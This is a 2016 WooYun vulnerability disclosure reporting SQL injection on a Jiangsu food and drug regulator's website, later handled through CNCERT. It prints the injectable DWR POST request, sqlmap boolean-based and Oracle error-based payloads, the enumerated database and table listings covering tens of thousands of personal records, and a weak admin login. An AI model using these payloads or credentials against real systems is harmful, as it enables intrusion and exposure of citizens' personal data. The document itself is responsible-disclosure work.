当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166474

漏洞标题:江苏省食品药品监督管理局某站SQL注入,泄露40个库和5万人员信息(手机号码,身份证,姓名,学历,职位等)

相关厂商:江苏省食品药品监督管理局

漏洞作者: 逆流冰河

提交时间:2016-01-02 00:18

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

政府

详细说明:

1,注入点:

POST http://**.**.**.**/dwr/call/plaincall/UserValidate.isNameExist.dwr HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 237
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Content-Type: text/plain
Accept: */*
Referer: http://**.**.**.**/register.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4455EDD1EA17939E7A0283CA97CCD903; _gscu_1901782482=51394714g66yq468; _gscs_1901782482=51394714n8fz2168|pv:64; _gscbrs_1901782482=1
callCount=1
windowName=
c0-scriptName=UserValidate
c0-methodName=isNameExist
c0-id=0
c0-param0=string:abcd123*
batchId=3
page=%2Fregister.jsp
httpSessionId=4455EDD1EA17939E7A0283CA97CCD903
scriptSessionId=D107918E0BAA78BCEC0FC9876CF1A8BA


c0-param0=string:abcd123*是可以注入的
2,估计是主库,数据库全出来了
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callCount=1
windowName=
c0-scriptName=UserValidate
c0-methodName=isNameExist
c0-id=0
c0-param0=string:abcd123' AND 9159=9159 AND 'TrQo'='TrQo
batchId=3
page=/register.jsp
httpSessionId=4455EDD1EA17939E7A0283CA97CCD903
scriptSessionId=D107918E0BAA78BCEC0FC9876CF1A8BA
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: callCount=1
windowName=
c0-scriptName=UserValidate
c0-methodName=isNameExist
c0-id=0
c0-param0=string:abcd123' AND 4902=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (4902=4902) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'jIgC'='jIgC
batchId=3
page=/register.jsp
httpSessionId=4455EDD1EA17939E7A0283CA97CCD903
scriptSessionId=D107918E0BAA78BCEC0FC9876CF1A8BA
---
back-end DBMS: Oracle
available databases [40]:
[*] AJYW
[*] APEX_030200
[*] APPQOSSYS
[*] CHARISMA
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FDA_PUB
[*] FLOWS_FILES
[*] HR
[*] HZP
[*] IX
[*] JSSPCJ
[*] JSYPCJ
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] QLYG
[*] QXJY_CLIENT
[*] QXXK
[*] QYYW
[*] SCOTT
[*] SH
[*] SXYPCJ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TYMK
[*] WMSYS
[*] WORKFLOW
[*] WORKFLOW_INST
[*] XDB
[*] YPCJ
[*] YPJY_CLIENT
[*] ZWDT
3,用户信息呢 这里只是一个库,其他库数据很多,用户表里面数据很多,手机号码,身份证,学历等等
Database: FDA_PUB
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| PUB_UCBUSI | 55901 |
| PUB_USERCORP | 45223 |
| PUB_CORP | 42269 |
| PUB_USER | 40435 | 用户表
| PUB_UCBRESULT | 27452 |
| TS_RYJL | 19980 |
| TB_RYJB | 18286 |
| TRA_REVOCATION | 1066 |
| TB_CP | 616 |
| TRA_ATTACHMENT_CONTENT | 194 |
| TRA_CORPAPPLICATION | 194 |
| PUB_DIC_YWLX | 127 |
| PUB_DIC_QLZXT | 52 |
| TB_SQRJBB | 52 |
| PUB_DIC_QL | 48 |
| TS_YWZD | 29 |
| PUB_BUSI | 27 |
| TB_RYJB1 | 13 |
| TS_RYJL1 | 13 |
| TS_ZDLX | 2 |
+------------------------+---------+
4,Database: SH
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| SALES | 918843 |
| COSTS | 82112 |
| CUSTOMERS | 55500 |
| FWEEK_PSCAT_SALES_MV | 11266 |
| SUPPLEMENTARY_DEMOGRAPHICS | 4500 |
| TIMES | 1826 |
| PROMOTIONS | 503 |
| PRODUCTS | 72 |
| CAL_MONTH_SALES_MV | 48 |
| COUNTRIES | 23 |
| DR$SUP_TEXT_IDX$R | 22 |
| CHANNELS | 5 |
+----------------------------+---------+
Database: TYMK
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| QLWSTMYX_FJ | 38600 |
| QLWSTMYX_FJNR | 36989 |
| QLWSTMYX_YWZB | 28857 |
| QLWSTMYX_ZYYSZC | 22531 |
| QLWSTMYX_DQZYYSXX | 11870 |
| YPSCXK_BAYPZCZ | 7739 |
| YPSCXK_DQYPZCZ | 7626 |
| QLWSTMYX_QSCL | 4095 |
| YPSCXK_PEOLEINFO | 3216 |
| QLWSTMYX_SQRKB | 2082 |
| YPSCXK_DQQYSCDZFW | 1953 |
| YPSCXK_BAQYSCDZFW | 1900 |
| YPSCXK_BAQYSCJXPZ | 1765 |
| YPSCXK_DQQYSCJXPZ | 1745 |
| QLWSTMYX_ZYYSZC2 | 1346 |
| QLWSTMYX_ZYYSZC3 | 1346 |
| YPSCXK_BGXM | 1220 |
| YPSCXK_BGQYSCDZFW | 952 |
| QXC_QXSCZLTXKH | 845 |
| YPSCXK_BAGMPXX | 735 |
| YPSCXK_DQGMPXX | 710 |
| QLWSTMYX_FZXX | 688 |
| YPSCXK_BAQYJBXX | 566 |
| YPSCXK_DQQYJBXX | 548 |
| QLWSTMYX_YWZB2 | 545 |
| YPSCXK_BAYPSCXKZXX | 539 |
| YPSCXK_DQYPSCXKZXX | 536 |
| TT | 416 |
| YPWTJG_WTPZXX | 398 |
| YPSCXK_QYSCJXPZ | 224 |
| YPWTJG_DQWTXX | 207 |
| YPSCXK_BAQYSCJWGMP | 201 |
| YPSCXK_DQQYSCJWGMP | 199 |
| QLWSTMYX_DZ | 189 |
| YPSCXK_QYSCDZFW | 125 |
| ST_REGION | 120 |
| QLWSTMYX_FJLX | 113 |
| YPSCXK_QYJBXX | 113 |
| AA | 93 |
| QLWSTMYX_YWLX | 87 |
| YPWTJG_WTBL | 46 |
| QLWSTMYX_GSGG | 43 |
| QLWSTMYX_XCJCFA | 16 |
| QLWSTMYX_BYXKTZS | 1 |
| QLWSTMYX_CODE_SLH | 1 |
+--------------------+---------+
5,我就不一一搞了
6,找个登录页面看看
http://**.**.**.**/sysmng.logout.do

111111.jpg


lsht/123 登录,这密码真2

444444.jpg

漏洞证明:

没搞破坏,不要查水表

修复方案:

没搞破坏,不要查水表

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-08 16:09

厂商回复:

CNVD确认所述漏洞情况,已经转由CNCERT下发江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无